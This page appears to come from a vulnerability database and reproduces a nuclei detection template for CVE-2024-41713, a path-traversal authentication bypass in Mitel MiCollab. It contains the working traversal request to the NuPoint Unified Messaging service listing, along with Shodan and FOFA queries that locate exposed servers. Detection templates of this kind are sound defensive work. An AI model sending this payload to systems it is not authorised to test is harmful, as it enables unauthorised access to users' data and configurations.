Mitel MiCollab - Authentication Bypass

Published: 05 Dec 2024 11:11:43
Reported by: ProjectDiscovery
Type: nuclei
Source: github.com

Mitel MiCollab vulnerability allows unauthorized access via authentication bypass, risking data integrity.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Cvelist | CVE-2024-35286 | 21 Oct 2024 00:00 | cvelist |
| Cvelist | CVE-2024-41713 | 21 Oct 2024 00:00 | cvelist |
| GithubExploit | Exploit for Path Traversal in Mitel Micollab | 11 Jan 2025 02:39 | githubexploit |
| GithubExploit | Exploit for Path Traversal in Mitel Micollab | 5 Dec 2024 06:13 | githubexploit |
| Vulnrichment | CVE-2024-35286 | 21 Oct 2024 00:00 | vulnrichment |
| Vulnrichment | CVE-2024-41713 | 21 Oct 2024 00:00 | vulnrichment |
| NVD | CVE-2024-35286 | 21 Oct 2024 21:15 | nvd |
| NVD | CVE-2024-41713 | 21 Oct 2024 21:15 | nvd |
| OpenVAS | Apache Axis2 Detection (HTTP) | 20 Sep 2010 00:00 | openvas |
| OpenVAS | Directory Scanner | 3 Nov 2005 00:00 | openvas |

id: CVE-2024-41713

info:
  name: Mitel MiCollab - Authentication Bypass
  author: DhiyaneshDK,watchTowr
  severity: high
  description: |
    A vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab through 9.8 SP1 FP2 (9.8.1.201) could allow an unauthenticated attacker to conduct a path traversal attack, due to insufficient input validation. A successful exploit could allow unauthorized access, enabling the attacker to view, corrupt, or delete users' data and system configurations.
  reference:
    - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2024-0029
    - https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/?123
    - https://nvd.nist.gov/vuln/detail/CVE-2024-41713
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-41713
    cwe-id: CWE-22
    epss-score: 0.00044
    epss-percentile: 0.12006
  metadata:
    verified: true
    max-request: 1
    vendor: mitel
    product: cmg_suite
    shodan-query: http.html:"Mitel Networks"
    fofa-query: body="mitel networks"
  tags: cve,cve204,mitel,cmg-suite,auth-bypass

http:
  - raw:
      - |
        GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Available services"
          - "Service Description"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022071c2e0cacae9ddccb1def297ab46e88b91dc5ff1f5f3d05c8f2181e5070d23e2022062a66764361eca00011f8568ae9df5c05a3e47bcc30221e27fc52dff54ad76b3:922c64590222798bb761d5b6d8e72950

05 Dec 2024 11:43 (current)
Vulners AI Score: 7.3 (High risk)
CVSS3: 9.8
EPSS: 0.952